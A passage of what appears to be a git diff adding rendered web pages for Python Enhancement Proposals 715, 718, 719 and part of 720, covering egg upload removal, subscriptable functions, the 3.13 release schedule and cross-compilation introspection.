We recommend that clients support both keys, for both HTML and JSON, preferring +the newer key as this PEP requires. This will allow clients to support +repositories that already have correctly implemented PEP 658 and PEP 691 +but have not implemented this PEP.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0714.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0715/index.html b/pep-0715/index.html new file mode 100644 index 00000000000..ba1a6680e91 --- /dev/null +++ b/pep-0715/index.html @@ -0,0 +1,308 @@ + + + + + + + + PEP 715 – Disabling bdist_egg distribution uploads on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 715 – Disabling bdist_egg distribution uploads on PyPI

+
+
Author:
+
William Woodruff <william at yossarian.net>
+
Sponsor:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
06-Jun-2023
+
Post-History:
+
09-Jun-2023
+
Resolution:
+
24-Jun-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP recommends deprecating and then disabling new uploads of the +bdist_egg distribution type on PyPI. In a parallel move, this PEP recommends +deprecating and then disabling new uploads of distribution filenames that have +the .egg suffix.

+

After this PEP, PyPI will only accept new uploads of the sdist +and bdist_wheel types, corresponding to files with .tar.gz/.zip and +.whl suffixes respectively.

+

This PEP does not recommend removing or otherwise affecting any previously +uploaded bdist_egg distributions or files with the .egg suffix.

+
+
+

Rationale

+
+

Previous Work

+

The groundwork for this proposal was established with PEP 527, which +proposed deprecating and eventually removing upload support for a handful +of un(der)used file extensions and distribution types.

+

In particular, PEP 527 proposed the removal of the bdist_dumb, +bdist_rpm, bdist_dmg, bdist_msi, and bdist_wininst distribution +types, as well as the .tar, .tar.bz2, .tar.xz, .tar.Z, +.tgz, and .tbz file extensions on distribution filenames.

+

PEP 527 was fully enacted with +PR #7529 to Warehouse, +which was merged on 13 April 2020.

+
+
+

The bdist_egg format

+

The bdist_egg filetype identifies distributions in the +egg format. The +egg format was introduced by setuptools in 2004 and is roughly equivalent +in functionality to the +wheel format +first introduced by PEP 427 in 2012 +as the standardized format +for built distributions.

+

Despite its longevity, the egg format has had +limited adoption on PyPI. +Some observations from that issue:

+
    +
  • In the month of May 2023, bdist_egg uploads accounted for 0.2% of all +distribution uploads to PyPI;
  • +
  • pip deprecated its --egg option in 2016;
  • +
  • setuptools has considered egg support deprecated since 2019;
  • +
  • build only supports the sdist and bdist_wheel filetypes.
  • +
+

Given the above, this PEP proposes the removal of the bdist_egg format +under the same justifications presented in PEP 527, namely:

+
    +
  • Egg distributions are of limited use to the broader ecosystem and +therefore represent a non-reciprocal maintenance burden;
  • +
  • Having an additional built distribution format +is confusing to end users, who may +mistakenly pick it over the wheel format;
  • +
+

This PEP additionally offers an argument for removal rooted in +standardization and duplication: the egg format is not standardized by any +PEP or other community standard, and overlaps heavily with its standardized +and well-supported alternative (wheel).

+
+
+

The .egg file extension

+

The .egg file extension is used exclusively for distributions of the +bdist_egg format. As such, it serves no purpose in a scenario where +PyPI disables new distribution uploads for bdist_egg distributions.

+
+
+
+

Removal Process

+

This PEP does NOT propose removing any existing files from PyPI, only +disallowing new ones from being uploaded.

+

PyPI will provide a deprecation period of one month. At the beginning +of the deprecation period, maintainers of projects that have uploaded one or +more egg distributions since 1 Jan 2023 will receive a one-time email informing +them of the upcoming end of support for egg distribution uploads.

+

 During the deprecation period, users will continue to be allowed to upload egg distributions to new and existing projects. Uploading an egg distribution during this period will also send all maintainers of the project an email similar to the one above, reminding them of the upcoming end of support.

+

After the deprecation period, support for uploading egg distributions will +cease to exist on PyPI.

+
+

Prior Art

+

The removal process above was based on that of PEP 527, with the following +changes:

+
    +
  • All projects will continue to be allowed to upload eggs during the deprecation period, not just those that have done so previously.
  • +
  • Uploading an egg during the deprecation period will also trigger an email +to maintainers, in addition to the one-time email at the beginning.
  • +
+
+
+
+

Backwards Compatibility

+
+

Limited Impact

+

As noted in the rationale section, this PEP is expected to have no impact +on the overwhelming majority of PyPI users and projects, and there has been +substantial community coordination +over the past 1 1/2 years to minimize the impact on the few last use cases.

+
+
+

Hosted Files

+

This PEP does NOT propose the removal of any egg distributions that have +already been uploaded to PyPI. All previously uploaded egg distributions will +remain downloadable, ensuring that existing users will continue to be able +to download them.

+
+
+

Deprecation Period

+

This PEP uses the removal process documented above, which specifies +a deprecation period of 1 month for projects that have previously uploaded +egg distributions to PyPI.

+

After the end of the deprecation period, support for uploading new egg +distributions will cease to exist on PyPI.

+
+
+
+

Security Implications

+

This PEP does not identify any positive or negative security implications +associated with removing upload support for egg distributions.

+
+
+

How To Teach This

+

As part of the removal process, PyPI will send emails to all maintainers of +projects that have previously uploaded egg distributions in 2023.

+

Additionally, PyPI will write a post on the +PyPI blog that publicly announces the deprecation +period’s start and end.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0715.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0718/index.html b/pep-0718/index.html new file mode 100644 index 00000000000..7ba5ba82ef6 --- /dev/null +++ b/pep-0718/index.html @@ -0,0 +1,339 @@ + + + + + + + + PEP 718 – Subscriptable functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 718 – Subscriptable functions

+
+
Author:
+
James Hilton-Balfe <gobot1234yt at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
23-Jun-2023
+
Python-Version:
+
3.13
+
Post-History:
+
24-Jun-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

 This PEP proposes making function objects subscriptable for typing purposes. Doing so gives developers explicit control over the types produced by the type checker where bi-directional inference (which allows the types of parameters of anonymous functions to be inferred) and methods other than specialisation are insufficient. It also brings functions in line with regular classes in their ability to be subscriptable.

+
+
+

Motivation

+
+

Unknown Types

+

Currently, it is not possible to infer the type parameters to generic functions in +certain situations:

+
def make_list[T](*args: T) -> list[T]: ...
+reveal_type(make_list())  # type checker cannot infer a meaningful type for T
+
+
+

Making instances of FunctionType subscriptable would allow for this constructor to +be typed:

+
reveal_type(make_list[int]())  # type is list[int]
+
+
+

Currently you have to use an assignment to provide a precise type:

+
x: list[int] = make_list()
+reveal_type(x)  # type is list[int]
+
+
+

but this code is unnecessarily verbose taking up multiple lines for a simple function +call.

+

Similarly, T in this example cannot currently be meaningfully inferred, so x is +untyped without an extra assignment:

+
def factory[T](func: Callable[[T], Any]) -> Foo[T]: ...
+
+reveal_type(factory(lambda x: "Hello World" * x))
+
+
+

If function objects were subscriptable, however, a more specific type could be given:

+
reveal_type(factory[int](lambda x: "Hello World" * x))  # type is Foo[int]
+
+
+
+
+

Undecidable Inference

+

 There are even cases where subclass relations make type inference impossible. However, if you can specialise the function, type checkers can infer a meaningful type.

+
def foo[T](x: Sequence[T] | T) -> list[T]: ...
+
+reveal_type(foo[bytes](b"hello"))
+
+
+

Currently, type checkers do not consistently synthesise a type here.

+
+
+

Unsolvable Type Parameters

+

Currently, with unspecialised literals, it is not possible to determine a type for +situations similar to:

+
def foo[T](x: list[T]) -> T: ...
+reveal_type(foo([]))  # type checker cannot infer T (yet again)
+
+
+
reveal_type(foo[int]([]))  # type is int
+
+
+

 It is also useful to be able to specify the type in cases where a certain type must be passed to a function beforehand:

+
words = ["hello", "world"]
+foo[int](words)  # Invalid: list[str] is incompatible with list[int]
+
+
+

Allowing subscription makes functions and methods consistent with generic classes where +they weren’t already. Whilst all of the proposed changes can be implemented using +callable generic classes, syntactic sugar would be highly welcome.

+

 Due to this, specialising the function and using it as a new factory is fine:

+
make_int_list = make_list[int]
+reveal_type(make_int_list())  # type is list[int]
+
+
+
+
+

Monomorphisation and Reification

+

This proposal also opens the door to +monomorphisation and +reified types.

+

 This would allow for functionality which, anecdotally, has been requested many times.

+

Please note this feature is not being proposed by the PEP, but may be implemented in +the future.

+

The syntax for such a feature may look something like:

+
def foo[T]():
+   return T.__value__
+
+assert foo[int]() is int
+
+
+
+
+
+

Rationale

+

 The term “function objects” in this PEP refers to FunctionType, MethodType, BuiltinFunctionType, BuiltinMethodType and MethodWrapperType.

+

For MethodType you should be able to write:

+
class Foo:
+    def make_list[T](self, *args: T) -> list[T]: ...
+
+Foo().make_list[int]()
+
+
+

and have it work similarly to a FunctionType.

+

 For BuiltinFunctionType, this is so that builtin generic functions (e.g. max and min) work like ones defined in Python. Built-in functions should behave as much like functions implemented in Python as possible.

+

BuiltinMethodType is the same type as BuiltinFunctionType.

+

MethodWrapperType (e.g. the type of object().__str__) is useful for +generic magic methods.

+
+
+

Specification

+

Function objects should implement __getitem__ to allow for subscription at runtime +and return an instance of types.GenericAlias with __origin__ set as the +callable and __args__ as the types passed.

+

Type checkers should support subscripting functions and understand that the parameters +passed to the function subscription should follow the same rules as a generic callable +class.

+
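 Since FunctionType.__getitem__ does not exist today, the runtime behaviour described above can be emulated with a small wrapper. This is a hedged sketch of the proposed semantics, not the PEP’s implementation:
 
+
import types
+
+class subscriptable:
+    """Wrap a function so that f[int] returns a types.GenericAlias."""
+    def __init__(self, func):
+        self.func = func
+    def __call__(self, *args, **kwargs):
+        return self.func(*args, **kwargs)
+    def __getitem__(self, item):
+        # __origin__ is the callable, __args__ the subscripted types.
+        return types.GenericAlias(self, item)
+
+@subscriptable
+def make_list(*args):
+    return list(args)
+
+alias = make_list[int]
+assert alias.__origin__ is make_list
+assert alias.__args__ == (int,)
+assert alias(1, 2, 3) == [1, 2, 3]  # GenericAlias.__call__ forwards to __origin__
+
+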
+

Setting __orig_class__

+

Currently, __orig_class__ is an attribute set in GenericAlias.__call__ to the +instance of the GenericAlias that created the called class e.g.

+
class Foo[T]: ...
+
+assert Foo[int]().__orig_class__ == Foo[int]
+
+
+

Currently, __orig_class__ is unconditionally set; however, to avoid potential +erasure on any created instances, this attribute should not be set if __origin__ is +an instance of any function object.

+

The following code snippet would fail at runtime without this change as +__orig_class__ would be bar[str] and not Foo[int].

+
def bar[U]():
+    return Foo[int]()
+
+assert bar[str]().__orig_class__  == Foo[int]
+
+
+
+
+

Interactions with @typing.overload

+

Overloaded functions should work much the same as already, since they have no effect on +the runtime type. The only change is that more situations will be decidable and the +behaviour/overload can be specified by the developer rather than leaving it to ordering +of overloads/unions.

+
+
+
+

Backwards Compatibility

+

 Currently these classes are not subclassable, and so there are no backwards compatibility concerns with regard to classes already implementing __getitem__.

+
+
+

Reference Implementation

+

The runtime changes proposed can be found here +https://github.com/Gobot1234/cpython/tree/function-subscript

+
+
+

Acknowledgements

+

Thank you to Alex Waygood and Jelle Zijlstra for their feedback on this PEP and Guido +for some motivating examples.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0718.rst

+

Last modified: 2024-02-17 03:29:08 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0719/index.html b/pep-0719/index.html new file mode 100644 index 00000000000..c988981423e --- /dev/null +++ b/pep-0719/index.html @@ -0,0 +1,220 @@ + + + + + + + + PEP 719 – Python 3.13 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 719 – Python 3.13 Release Schedule

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
26-May-2023
+
Python-Version:
+
3.13
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.13.

+
+
+

Release Manager and Crew

+
    +
  • 3.13 Release Manager: Thomas Wouters
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.13.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.13 development begins: Monday, 2023-05-22
  • +
  • 3.13.0 alpha 1: Friday, 2023-10-13
  • +
  • 3.13.0 alpha 2: Wednesday, 2023-11-22
  • +
  • 3.13.0 alpha 3: Wednesday, 2024-01-17
  • +
  • 3.13.0 alpha 4: Thursday, 2024-02-15
  • +
  • 3.13.0 alpha 5: Tuesday, 2024-03-12
  • +
  • 3.13.0 alpha 6: Tuesday, 2024-04-09
  • +
  • 3.13.0 beta 1: Wednesday, 2024-05-08 +(No new features beyond this point.)
  • +
  • 3.13.0 beta 2: Wednesday, 2024-06-05
  • +
  • 3.13.0 beta 3: Thursday, 2024-06-27
  • +
  • 3.13.0 beta 4: Thursday, 2024-07-18
  • +
  • 3.13.0 candidate 1: Thursday, 2024-08-01
  • +
  • 3.13.0 candidate 2: Friday, 2024-09-06
  • +
  • 3.13.0 candidate 3: Tuesday, 2024-10-01
  • +
  • 3.13.0 final: Monday, 2024-10-07
  • +
  • 3.13.1: Tuesday, 2024-12-03
  • +
+
+
+

Bugfix releases

+

Expected:

+
    +
  • 3.13.2: Tuesday, 2025-02-04
  • +
  • 3.13.3: Tuesday, 2025-04-08
  • +
  • 3.13.4: Tuesday, 2025-06-03
  • +
  • 3.13.5: Tuesday, 2025-08-05
  • +
  • 3.13.6: Tuesday, 2025-10-07
  • +
  • 3.13.7: Tuesday, 2025-12-02
  • +
  • 3.13.8: Tuesday, 2026-02-03
  • +
  • 3.13.9: Tuesday, 2026-04-07
  • +
  • 3.13.10: Tuesday, 2026-06-09
  • +
  • 3.13.11: Tuesday, 2026-08-04
  • +
  • 3.13.12: Tuesday, 2026-10-06
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an as-needed basis until October 2029.

+
+
+

3.13 Lifespan

+

3.13 will receive bugfix updates approximately every 2 months for +approximately 24 months. Around the time of the release of 3.15.0 final, the +final 3.13 bugfix update will be released. After that, it is expected that +security updates (source only) will be released until 5 years after the +release of 3.13.0 final, so until approximately October 2029.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0719.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0720/index.html b/pep-0720/index.html new file mode 100644 index 00000000000..a70e6835eac --- /dev/null +++ b/pep-0720/index.html @@ -0,0 +1,1109 @@ + + + + + + + + PEP 720 – Cross-compiling Python packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 720 – Cross-compiling Python packages

+
+
Author:
+
Filipe Laíns <lains at riseup.net>
+
PEP-Delegate:
+

+
Status:
+
Draft
+
Type:
+
Informational
+
Created:
+
01-Jul-2023
+
Python-Version:
+
3.12
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP attempts to document the status of cross-compilation of downstream +projects.

+

It should give an overview of the approaches currently used by distributors +(Linux distros, WASM environment providers, etc.) to cross-compile downstream +projects (3rd party extensions, etc.).

+
+
+

Motivation

+

We write this PEP to express the challenges in cross-compilation and act as a +supporting document in future improvement proposals.

+
+
+

Analysis

+
+

Introduction

+

 There are a couple of different approaches being used to tackle this, with different levels of interaction required from the user, but they all require a significant amount of effort. This is due to the lack of standardized cross-compilation infrastructure in the Python packaging ecosystem, which itself stems from the complexity of cross-builds, making them a huge undertaking.

+
+
+

Upstream support

+

Some major projects like CPython, setuptools, etc. provide some support to help +with cross-compilation, but it’s unofficial and at a best-effort basis. For +example, the sysconfig module allows overwriting the data module name via +the _PYTHON_SYSCONFIGDATA_NAME environment variable, something that is +required for cross-builds, and setuptools accepts patches [1] to tweak/fix +its logic to be compatible with popular “environment faking” workflows [2].

+

The lack of first-party support in upstream projects leads to cross-compilation +being fragile and requiring a significant effort from users, but at the same +time, the lack of standardization makes it harder for upstreams to improve +support as there’s no clarity on how this feature should be provided.

+ +
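 As an illustration of the sysconfig override mentioned above, a cross-build can run the build interpreter with the target’s sysconfig data module selected. This is a hedged sketch: the module name and path below are invented, and the environment variable is undocumented and subject to change.
 
+
import os
+import subprocess
+
+env = os.environ.copy()
+# Point sysconfig at a data module describing the *target*, not the build host.
+env["_PYTHON_SYSCONFIGDATA_NAME"] = "_sysconfigdata__linux_aarch64-linux-gnu"
+env["PYTHONPATH"] = "/path/to/target/sysconfigdata"  # where that module lives
+subprocess.run(
+    ["python", "-c",
+     "import sysconfig; print(sysconfig.get_config_var('EXT_SUFFIX'))"],
+    env=env,
+    check=True,
+)
+
+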
+

Projects with decent cross-build support

+

It seems relevant to point out that there are a few modern Python package +build-backends with, at least, decent cross-compilation support, those being +scikit-build and meson-python. Both these projects integrate external mature +build-systems into Python packaging — CMake and Meson, respectively — so +cross-build support is inherited from them.

+
+
+
+

Downstream approaches

+

 Cross-compilation approaches fall on a spectrum that goes from, by design, requiring extensive user interaction to (ideally) almost none. Usually, they’ll be based on one of two main strategies: using a cross-build environment, or faking the target environment.

+
+

Cross-build environment

+

 This consists of running the Python interpreter normally and utilizing the cross-build support provided by the projects’ build-system. However, as we saw above, upstream support is lacking, so this approach only works for a small-ish set of projects. When this fails, the usual strategy is to patch the build-system code to use the correct toolchain, system details, etc. [3].

+

Since this approach often requires package-specific patching, it requires a lot +of user interaction.

+
+

Examples

+

python-for-android, kivy-ios, etc.

+
+ +
+
+

Faking the target environment

+

 Aiming to drop the requirement for user input, a popular approach is trying to fake the target environment. It generally consists of monkeypatching the Python interpreter to get it to mimic the interpreter on the target system, which means changing many of the sys module attributes, the sysconfig data, etc. Using this strategy, build-backends do not need to have any cross-build support, and should just work without any code changes.

+

 Unfortunately, though, it isn’t possible to truly fake the target environment. There are many reasons for this, one of the main ones being that it breaks code that actually needs to introspect the running interpreter. As a result, monkeypatching Python to look like the target is very tricky — to achieve the least amount of breakage, we can only patch certain aspects of the interpreter. Consequently, build-backends may need some code changes, but these are generally much smaller than with the previous approach. This is an inherent limitation of the technique, meaning this strategy still requires some user interaction.

+

Nonetheless, this strategy still works out-of-the-box with significantly more +projects than the approach above, and requires much less effort in these cases. +It is successful in decreasing the amount of user interaction needed, even +though it doesn’t succeed in being generic.

+
+

Examples

+

crossenv, conda-forge, etc.

+
+
+
+
+

Environment introspection

+

As explained above, most build system code is written with the assumption that +the target system is the same as where the build is occurring, so introspection +is usually used to guide the build.

+

 In this section, we try to document most of the ways this is accomplished. It should give a decent overview of the environment details that are required by build systems.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SnippetDescriptionVariance
>>> importlib.machinery.EXTENSION_SUFFIXES
+[
+   '.cpython-311-x86_64-linux-gnu.so',
+   '.abi3.so',
+   '.so',
+]
+
+
+
Extension (native module) suffixes supported by this interpreter.This is implementation-defined, but it usually differs based on the +implementation, system architecture, build configuration, Python +language version, and implementation version — if one exists.
>>> importlib.machinery.SOURCE_SUFFIXES
+['.py']
+
+
+
Source (pure-Python) suffixes supported by this interpreter.This is implementation-defined, but it usually doesn’t differ +(outside exotic implementations or systems).
>>> importlib.machinery.all_suffixes()
+[
+   '.py',
+   '.pyc',
+   '.cpython-311-x86_64-linux-gnu.so',
+   '.abi3.so',
+   '.so',
+]
+
+
+
All module file suffixes supported by this interpreter. It should be the +union of all importlib.machinery.*_SUFFIXES attributes.This is implementation-defined, but it usually differs based on the +implementation, system architecture, build configuration, Python +language version, and implementation version — if one exists. See the +entries above for more information.
>>> sys.abiflags
+''
+
+
+
ABI flags, as specified in PEP 3149.Differs based on the build configuration.
>>> sys.api_version
+1013
+
+
+
C API version.Differs based on the Python installation.
>>> sys.base_prefix
+/usr
+
+
+
Prefix of the installation-wide directories where platform independent +files are installed.Differs based on the platform, and installation.
>>> sys.base_exec_prefix
+/usr
+
+
+
Prefix of the installation-wide directories where platform dependent +files are installed.Differs based on the platform, and installation.
>>> sys.byteorder
+'little'
+
+
+
Native byte order.Differs based on the platform.
>>> sys.builtin_module_names
+('_abc', '_ast', '_codecs', ...)
+
+
+
Names of all modules that are compiled into the Python interpreter.Differs based on the platform, system architecture, and build +configuration.
>>> sys.exec_prefix
+/usr
+
+
+
Prefix of the site-specific directories where platform dependent files are installed. Because it concerns the site-specific directories, in standard virtual environment implementations, it will be a virtual-environment-specific path.Differs based on the platform, installation, and environment.
>>> sys.executable
+'/usr/bin/python'
+
+
+
Path of the Python interpreter being used.Differs based on the installation.
>>> with open(sys.executable, 'rb') as f:
+...   header = f.read(4)
+...   if is_elf := (header == b'\x7fELF'):
+...     elf_class = f.read(1)[0]  # EI_CLASS byte: 1 = 32-bit, 2 = 64-bit
+...     size = {1: 52, 2: 64}.get(elf_class)
+...     elf_header = f.read(size - 5)
+
+
+
Whether the Python interpreter is an ELF file, and the ELF header. This +approach is something used to identify the target architecture of the +installation (example).Differs based on the installation.
>>> sys.float_info
+sys.float_info(
+   max=1.7976931348623157e+308,
+   max_exp=1024,
+   max_10_exp=308,
+   min=2.2250738585072014e-308,
+   min_exp=-1021,
+   min_10_exp=-307,
+   dig=15,
+   mant_dig=53,
+   epsilon=2.220446049250313e-16,
+   radix=2,
+   rounds=1,
+)
+
+
+
Low level information about the float type, as defined by float.h.Differs based on the architecture, and platform.
>>> sys.getandroidapilevel()
+21
+
+
+
Integer representing the Android API level.Differs based on the platform.
>>> sys.getwindowsversion()
+sys.getwindowsversion(
+   major=10,
+   minor=0,
+   build=19045,
+   platform=2,
+   service_pack='',
+)
+
+
+
Windows version of the system.Differs based on the platform.
>>> sys.hexversion
+0x30b03f0
+
+
+
Python version encoded as an integer.Differs based on the Python language version.
>>> sys.implementation
+namespace(
+   name='cpython',
+   cache_tag='cpython-311',
+   version=sys.version_info(
+      major=3,
+      minor=11,
+      micro=3,
+      releaselevel='final',
+      serial=0,
+   ),
+   hexversion=0x30b03f0,
+   _multiarch='x86_64-linux-gnu',
+)
+
+
+
Interpreter implementation details.Differs based on the interpreter implementation, Python language +version, and implementation version — if one exists. It may also include +architecture-dependent information, so it may also differ based on the +system architecture.
>>> sys.int_info
+sys.int_info(
+   bits_per_digit=30,
+   sizeof_digit=4,
+   default_max_str_digits=4300,
+   str_digits_check_threshold=640,
+)
+
+
+
Low level information about Python’s internal integer representation.Differs based on the architecture, platform, implementation, build, and +runtime flags.
>>> sys.maxsize
+0x7fffffffffffffff
+
+
+
Maximum value a variable of type Py_ssize_t can take.Differs based on the architecture, platform, and implementation.
>>> sys.maxunicode
+0x10ffff
+
+
+
Value of the largest Unicode code point.Differs based on the implementation, and on Python versions older than +3.3, the build.
>>> sys.platform
+linux
+
+
+
Platform identifier.Differs based on the platform.
>>> sys.prefix
+/usr
+
+
+
Prefix of the site-specific directories where platform independent files are installed. Because it concerns the site-specific directories, in standard virtual environment implementations, it will be a virtual-environment-specific path.Differs based on the platform, installation, and environment.
>>> sys.platlibdir
+lib
+
+
+
Platform-specific library directory.Differs based on the platform, and vendor.
>>> sys.version_info
+sys.version_info(
+   major=3,
+   minor=11,
+   micro=3,
+   releaselevel='final',
+   serial=0,
+)
+
+
+
Python language version implemented by the interpreter.Differs if the target Python version is not the same [4].
>>> sys.thread_info
+sys.thread_info(
+   name='pthread',
+   lock='semaphore',
+   version='NPTL 2.37',
+)
+
+
+
Information about the thread implementation.Differs based on the platform, and implementation.
>>> sys.winver
+3.8-32
+
+
+
Version number used to form Windows registry keys.Differs based on the platform, and implementation.
>>> sysconfig.get_config_vars()
+{ ... }
+>>> sysconfig.get_config_var(...)
+...
+
+
+
Python distribution configuration variables. It includes a set of +variables [5] — like prefix, exec_prefix, etc. — based on the +running context [6], and may include some extra variables based on the +Python implementation and system.

 In CPython and most other implementations that use the same build-system, the “extra” variables mentioned above are: on POSIX, all variables from the Makefile used to build the interpreter, and on Windows, usually only a small subset of those [7] — like EXT_SUFFIX, BINDIR, etc.

+
This is implementation-defined, but it usually differs between non-identical builds. Please refer to the sysconfig configuration variables table for an overview of the different configuration variables that are usually present.
+ +
+

CPython (and similar)

+ + ++++++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
sysconfig configuration variables
NameExample ValueDescriptionVariance
SOABIcpython-311-x86_64-linux-gnuABI string — defined by PEP 3149.Differs based on the implementation, system architecture, Python +language version, and implementation version — if one exists.
SHLIB_SUFFIX.soShared library suffix.Differs based on the platform.
EXT_SUFFIX.cpython-311-x86_64-linux-gnu.soInterpreter-specific Python extension (native module) suffix — generally +defined as .{SOABI}.{SHLIB_SUFFIX}.Differs based on the implementation, system architecture, Python +language version, and implementation version — if one exists.
LDLIBRARYlibpython3.11.soShared libpython library name — if available. If unavailable [8], the variable will be empty; if available, the library should be located in LIBDIR.Differs based on the implementation, system architecture, build configuration, Python language version, and implementation version — if one exists.
PY3LIBRARYlibpython3.soShared Python 3 only (major version bound only) [9] libpython library name — if available. If unavailable [8], the variable will be empty; if available, the library should be located in LIBDIR.Differs based on the implementation, system architecture, build configuration, Python language version, and implementation version — if one exists.
LIBRARYlibpython3.11.aStatic libpython library name — if available. If unavailable [8], the variable will be empty; if available, the library should be located in LIBDIR.Differs based on the implementation, system architecture, build configuration, Python language version, and implementation version — if one exists.
Py_DEBUG0Whether this is a debug build.Differs based on the build configuration.
WITH_PYMALLOC1Whether this build has pymalloc support.Differs based on the build configuration.
Py_TRACE_REFS0Whether reference tracing (debug build only) is enabled.Differs based on the build configuration.
Py_UNICODE_SIZESize of the Py_UNICODE object, in bytes. This variable is only +present in CPython versions older than 3.3, and was commonly used to +detect if the build uses UCS2 or UCS4 for unicode objects — before +PEP 393.Differs based on the build configuration.
Py_ENABLE_SHARED1Whether a shared libpython is available.Differs based on the build configuration.
PY_ENABLE_SHARED1Whether a shared libpython is available.Differs based on the build configuration.
CCgccThe C compiler used to build the Python distribution.Differs based on the build configuration.
CXXg++The C++ compiler used to build the Python distribution.Differs based on the build configuration.
CFLAGS-DNDEBUG -g -fwrapv ...The C compiler flags used to build the Python distribution.Differs based on the build configuration.
py_version3.11.3Full form of the Python version.Differs based on the Python language version.
py_version_short3.11Custom form of the Python version, containing only the major and minor +numbers.Differs based on the Python language version.
py_version_nodot311Custom form of the Python version, containing only the major and minor +numbers, and no dots.Differs based on the Python language version.
prefix/usrSame as sys.prefix, please refer to the entry in table above.Differs based on the platform, installation, and environment.
base/usrSame as sys.prefix, please refer to the entry in table above.Differs based on the platform, installation, and environment.
exec_prefix/usrSame as sys.exec_prefix, please refer to the entry in table above.Differs based on the platform, installation, and environment.
platbase/usrSame as sys.exec_prefix, please refer to the entry in table above.Differs based on the platform, installation, and environment.
installed_base/usrSame as sys.base_prefix, please refer to the entry in table above.Differs based on the platform, and installation.
installed_platbase/usrSame as sys.base_exec_prefix, please refer to the entry in table +above.Differs based on the platform, and installation.
platlibdirlibSame as sys.platlibdir, please refer to the entry in table above.Differs based on the platform, and vendor.
SIZEOF_*4Size of a certain C type (double, float, etc.).Differs based on the system architecture, and build details.
+ +
+
+
+

Relevant Information

+

 There are some bits of information required by build systems — e.g. platform particularities — scattered across many places, and it is often difficult to identify code with assumptions based on them. In this section, we try to document the most relevant cases.

+
+

When should extensions be linked against libpython?

+
+
Short answer
Yes, on Windows. No on POSIX platforms, except Android, Cygwin, and other +Windows-based POSIX-like platforms.
+
+

When building extensions for dynamic loading, depending on the target platform, +they may need to be linked against libpython.

+

On Windows, extensions need to link against libpython, because all symbols +must be resolvable at link time. POSIX-like platforms based on Windows — like +Cygwin, MinGW, or MSYS — will also require linking against libpython.

+

 On most POSIX platforms, it is not necessary to link against libpython, as the symbols will already be available, due to the interpreter — or, when embedding, the executable/library in question — already linking to libpython. Not linking an extension module against libpython allows it to be loaded by static Python builds, so when possible, it is desirable to do so (see GH-65735).

+

 This might not be the case on all POSIX platforms, so make sure you check. One example is Android, where only the main executable and LD_PRELOAD entries are considered to be RTLD_GLOBAL (meaning dependencies are RTLD_LOCAL) [10], which causes the libpython symbols to be unavailable when loading the extension.

+ +
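 A hedged sketch of how a build tool might encode the rule of thumb above (a heuristic only; always verify for the specific platform):
 
+
import sys
+
+def should_link_libpython() -> bool:
+    # Windows, and Windows-based POSIX-like platforms: all symbols must
+    # resolve at link time, so link against libpython.
+    if sys.platform in ("win32", "cygwin", "msys"):
+        return True
+    # Android: dependencies are loaded RTLD_LOCAL (see above), so link too.
+    if hasattr(sys, "getandroidapilevel"):
+        return True
+    # Most other POSIX platforms: do not link, so the extension can also be
+    # loaded by static Python builds.
+    return False
+
+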
+
+

What are prefix, exec_prefix, base_prefix, and base_exec_prefix?

+

These are sys attributes set in the Python initialization that describe +the running environment. They refer to the prefix of directories where +installation/environment files are installed, according to the table below.

+ + + + + + + + + + + + + + + + + + + + + + + + + +
NameTarget filesEnvironment Scope
prefixplatform independent (eg. pure Python)site-specific
